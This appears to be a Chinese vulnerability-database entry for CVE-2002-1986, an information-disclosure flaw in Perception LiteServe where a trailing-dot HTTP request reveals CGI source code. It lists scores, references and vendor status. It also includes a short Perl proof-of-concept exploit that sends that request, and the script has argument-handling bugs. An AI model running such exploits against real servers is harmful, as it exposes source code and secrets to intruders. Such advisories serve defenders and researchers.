CVE-2002-1986
CVSS5.0
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:32:01
NMCOE    

[原文]Perception LiteServe 2.0 through 2.0.1 allows remote attackers to obtain the source code of CGI scripts via an HTTP request with a trailing dot (".").


[CNNVD]Perception LiteServe CGI源代码泄露漏洞(CNNVD-200212-262)

        
        Perception LiteServe是一款集成HTTP、FTP、SMTP、POP3和TELNET服务的系统。其中HTTP服务支持CGI接口。
        Win32平台下的HTTP服务程序处理文件名存在问题,远程攻击者可以利用这个漏洞获得CGI脚本源代码信息。
        Win32平台下的LiteServe HTTP服务程序对于特殊文件名处理不正确,攻击者提交带有'.'结尾的文件名请求,可导致服务程序返回CGI脚本的源代码信息给攻击者。造成敏感信息泄露,攻击者可以利用此信息进一步对系统进行攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:perception:liteserve:2.0.1
cpe:/a:perception:liteserve:2.0
cpe:/a:perception:liteserve:2.0.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1986
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1986
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-262
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/10635.php
(PATCH)  XF  liteserve-script-source-disclosure(10635)
http://www.securityfocus.com/bid/6188
(UNKNOWN)  BID  6188
http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0074.html
(UNKNOWN)  VULNWATCH  20021114 Perception LiteServe HTTP CGI Disclosure Vulnerability

- 漏洞信息

Perception LiteServe CGI源代码泄露漏洞
中危 访问验证错误
2002-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Perception LiteServe是一款集成HTTP、FTP、SMTP、POP3和TELNET服务的系统。其中HTTP服务支持CGI接口。
        Win32平台下的HTTP服务程序处理文件名存在问题,远程攻击者可以利用这个漏洞获得CGI脚本源代码信息。
        Win32平台下的LiteServe HTTP服务程序对于特殊文件名处理不正确,攻击者提交带有'.'结尾的文件名请求,可导致服务程序返回CGI脚本的源代码信息给攻击者。造成敏感信息泄露,攻击者可以利用此信息进一步对系统进行攻击。
        

- 公告与补丁

        厂商补丁:
        Perception
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.liteserve.net/

- 漏洞信息 (22020)

Perception LiteServe 2.0 CGI Source Disclosure Vulnerability (EDBID:22020)
multiple remote
2002-11-14 Verified
0 mattmurphy
N/A [点击下载]
source: http://www.securityfocus.com/bid/6188/info

By constructing a malicious web request, it is possible for a remote attacker to disclose the source code of CGI scripts. Information gained through exploiting this issue may aid an attacker in launching further attacks against the target system.

#!/usr/bin/perl
#
# LS_FETCH.PL
# By Matthew Murphy
# LiteServe 2.02 and prior - CGI Disclosure
# Usage: perl ls_fetch.pl [filename] [host] [alias] [port]
use IO::Socket;
use URI::Escape;

$alias = "cgi-isapi"; # Default LiteServe CGI alias
$port = 80;
if (@ARGV < 2 || @ARGV > 4) {
print STDOUT "Usage: perl $0 [filename] [host] [alias=cgi-isapi] [port=80]
} else {
if (@ARGV >= 3) {
$alias = $ARGV[2];
}
if (@ARGV == 4) {
$port = $ARGV[3];
}
$filename = $ARGV[1];
$host = $ARGV[2];
$f = IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Proto=>"tcp");
$f->autoflush(1);
$b = sprintf("GET /%s/%s. HTTP/1.0\r\n\r\n", $alias, uri_escape($file));
print $f $b;
while (defined($line=<$f>)) {
print STDOUT $line;
}
undef $f;
}

		

- 漏洞信息

59524
Perception LiteServe URL Trailing Dot Request CGI Script Source Disclosure
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2002-11-14 Unknow
2002-11-14 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站